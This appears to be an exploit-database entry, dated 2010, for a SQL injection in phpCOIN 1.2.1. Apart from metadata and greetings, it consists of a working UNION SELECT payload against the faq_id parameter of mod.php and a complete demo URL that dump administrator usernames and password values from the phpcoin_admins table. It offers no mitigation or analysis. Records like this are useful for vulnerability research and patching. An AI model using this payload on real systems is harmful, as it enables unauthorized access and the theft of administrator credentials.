PHPCOIN 1.2.1 - 'mod.php' SQL Injection

Author: BAYBORA
type: webapps
platform: php
port: 
date_added: 2010-02-23 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

phpCOIN 1.2.1 (mod.php) SQL Injection  Vulnerability

###########################

Author    : Baybora

Homepage  : http://www.1923turk.com

Blog      : http://baybora.wordpress.com/

Script    : phpCOIN 1.2.1

Download  : http://www.phpcoin.com/

###########################

[ Vulnerable File ]

mod.php?mod=faq&mode=show&faq_id= [ SQL ]


[ XpL ]

-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--


[ Demo]


http://serverbilling/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--


##############################################################
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################